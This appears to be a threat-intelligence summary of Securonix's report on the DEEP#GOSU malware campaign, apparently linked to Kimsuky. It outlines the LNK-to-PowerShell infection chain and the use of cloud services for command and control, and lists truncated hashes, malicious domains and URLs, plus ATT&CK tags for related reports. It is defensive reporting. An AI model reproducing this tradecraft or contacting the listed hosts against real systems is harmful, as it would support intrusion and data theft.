Analysis of New DEEP#GOSU Attack Campaign Likely Associated with North Korean Kimsuky Targeting Victims with Stealthy Malware

2024-03-18 Securonix

https://www.securonix.com/blog/securonix-threat-research-security-advisory-new-deepgosu-attack-campaign/

Securonix tracks DEEP#GOSU as a multi-stage campaign likely associated with Kimsuky and aimed at South Korean victims. The infection chain begins with a ZIP-delivered PDF-themed LNK file that extracts and opens an embedded Korean PDF lure while running PowerShell to authenticate to Dropbox, decrypt, and execute next-stage payloads. Later stages use PowerShell and VBScript stagers, dynamically load .NET code in memory, and pull payloads such as r_enc.bin from Dropbox, supporting RAT functionality and ongoing monitoring. The campaign uses legitimate cloud services including Dropbox and Google Docs for C2 and payload delivery, helping the traffic blend into normal network activity while enabling the operators to update modules remotely.

Indicators of Compromise

Type Value First Seen Last Seen
HASH 89cad9a57985cc0ab3b7403a943ad0a… 2024-03-18 2024-12-27
HASH 60666cacdd6806ed05771f32eaa719e… 2024-03-18 2024-12-27
HASH b72caab78d164637fea0937d7a94fc4… 2024-03-18 2024-12-27
HASH f262588c48d2902992ffd275d2be636… 2024-03-18 2024-12-27
HASH 69c917ea96db28dbd5b67073ca0aac2… 2024-03-18 2024-12-27
HASH 1b75f70c226c9ada8e79c3fdd987277… 2024-03-18 2024-12-27
HASH 1617587ccdf5b0344089559ecf8fe7d… 2024-03-18 2024-12-27
HASH 46a5d54c264152ce915792af31c7582… 2024-03-18 2024-12-27
DOMAIN regard.co.kr 2024-03-18 2024-04-17
DOMAIN gbionet.com 2024-01-30 2024-04-17
URL https://content.dropboxapi.com/… 2024-03-18 2024-03-18
URL https://content.dropboxapi.com/… 2024-03-18 2024-03-18
URL http://gbionet.com/inc/basl/up1… 2024-03-18 2024-03-18
URL https://content.dropboxapi.com/… 2024-03-18 2024-03-18
URL https://content.dropboxapi.com/… 2024-03-18 2024-03-18
URL https://content.dropboxapi.com/… 2024-03-18 2024-03-18

Related Actors

Related Reports

2024-07-19 • 50% Match
#Trend #Andariel #Kimsuky #MoonstoneSleet #Lazarus #T1082 #T1059.003 #T1090 #T1140 #T1005 #T1070.004 #T1041 #T1113 #T1555 #T1560 #T1071.001 #T1046 #T1112 #T1115 #T1083 #T1497 #T1056.001 #T1036 #T1027 #T1204.002 #T1566.002 #T1555.003 #T1071 #T1124 #T1222 #T1552 #T1057 #T1583.003 #T1518.001 #T1547.001 #T1053.005 #T1539 #T1608.005 #T1583.001 #T1059.001 #T1053 #T1552.001 #T1566 #T1059 #T1003 #T1497.001 #T1102.001 #T1574.002 #T1562.001 #T1490 #T1486 #T1129 #T1133 #T1571 #T1548 #T1190 #T1203 #T1564.001 #T1087 #T1562.004 #T1218.011 #T1070.006 #T1547 #T1068 #T1614 #T1573 #T1095 #T1562 #T1070 #T1047 #T1056 #T1176 #T1010 #T1033 #T1569.002 #T1543.003 #T1485 #T1012 #T1202 #T1087.002 #T1021.004 #T1222.001 #T1518 #T1564.003 #T1505.003 #T1069.002 #T1564 #T1595.002 #T1027.005 #T1070.001 #T1056.004 #T1584
Shares tags: Kimsuky, T1082, T1140
2024-09-12 • 49% Match
#Kimsuky #T1102.002 #T1082 #T1059.003 #T1567.002 #T1140 #T1005 #T1070.004 #T1587.001 #T1041 #T1608.001 #T1071.001 #T1112 #T1083 #T1056.001 #T1059.006 #T1204.001 #T1059.007 #T1036 #T1027 #T1204.002 #T1566.002 #T1555.003 #T1057 #T1059.005 #T1583.006 #T1518.001 #T1566.001 #T1547.001 #T1585.002 #T1053.005 #T1598.003 #T1583.001 #T1059.001 #T1036.005 #T1552.001 #T1585.001 #T1105 #T1219 #T1055 #T1553.002 #T1562.001 #T1027.002 #T1133 #T1190 #T1098 #T1016 #T1074.001 #T1588.002 #T1055.012 #T1587 #T1078.003 #T1071.002 #T1562.004 #T1550.002 #T1111 #T1071.003 #T1591 #T1003.001 #T1218.011 #T1593.002 #T1586.002 #T1588.005 #T1583.004 #T1036.004 #T1589.003 #T1594 #T1218.010 #T1557 #T1593.001 #T1218.005 #T1589.002 #T1584.001 #T1070.006 #T1021.001 #T1560.001 #T1176 #T1136.001 #T1543.003 #T1012 #T1534 #T1560.003 #T1007 #T1564.003 #T1114.003 #T1114.002 #T1564.002 #T1040 #T1546.001 #T1505.003
Shares tags: Kimsuky, T1082, T1567.002
« Back